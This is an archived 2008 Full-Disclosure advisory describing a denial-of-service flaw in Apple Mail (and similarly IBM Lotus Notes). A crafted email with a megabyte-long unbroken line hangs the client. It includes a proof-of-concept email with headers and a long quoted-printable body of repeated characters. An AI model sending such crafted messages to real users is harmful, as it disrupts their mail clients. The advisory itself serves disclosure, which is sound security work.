lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <EB27A370-8013-4C37-AF64-709FEDE93D7B@davidwharton.us>
Date: Thu, 29 May 2008 19:31:39 -0500
From: David Wharton <security@...idwharton.us>
To: full-disclosure@...ts.grok.org.uk
Subject: Apple Mail Denial of Service Vulnerability (with
	bonus IBM Lotus Notes DoS!)


***Summary***

A maliciously crafted e-mail message can cause a denial of service in  
multiple versions of the Apple Mail email client.

***Scope***

Apple Mail version 3.1 (914/915)
Apple Mail version 3.2 (919/919.2)

Note: other versions of this product may be vulnerable as well; I have  
not tested them.  The vendor has been made aware of this issue and has  
chosen not to treat it as a security issue.

Interestingly enough, a similar issue seems to be present in multiple  
versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z -- http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611) 
.  The exploit provided in this advisory will also cause a denial of  
service condition on multiple versions of IBM Lotus Notes.  IBM has  
been kind enough to create SPR# PRAD7DPKLW to address the issue the  
exploit targets.

***Description***

An email message with a maliciously crafted body (in my tests I used a  
long line) can cause the e-mail client to hang, resulting in a denial  
of service condition.  Testing with emails that do not have any  
newline characters (0x0A, 0x0D) or spaces (0x20) shows that a line  
consisting of 1.5 MB can cause the email clients to hang for over half  
an hour.

Initial testing reveals the following:

In Apple Mail, the e-mail is rendered correctly in the preview pane  
but a subsequent click on a different e-mail causes the application to  
hang.

***Credits***

David Wharton

***References***

Apple Mail
http://www.apple.com/macosx/features/mail.html

***PoC Exploit***

Below is a sample e-mail with headers (some headers removed or  
modified) that causes the e-mail clients to hang as discussed.  Note  
that the body is one long line and the "=" character is not part of;  
it is there for formatting but in reality most of the body is one long  
contiguous string of A's.

Subject: dos test
MIME-Version: 1.0
From: xxxxx@...xx.com
To: xxxxx@...xx.com
Date: xxxxx
Message-ID: <xxxxx.xxxxx-xxxxx.xxxxx-xxxxx.xxxxx@...xx.com>
X-Mailer: xxxxx
MIME-Version: 1.0
Content-Type: text/html;
	charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0
X-CTASD-IP: xxx.xxx.xxx.xxx
X-CTASD-Sender: xxxxx@...xx.com
x-ctasd: uncategorized
x-ctasd-vod: uncategorized
x-ctasd-station:
X-OriginalArrivalTime: xxxxx@


<font  
size=3D"2">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
<snip> (removed a few thousand 'A's)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</ 
font>N=
OTICE:  This e-mail message and all attachments transmitted with it  
may con=
tain confidential information intended solely for the use of the  
addressee.=
<br />=

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ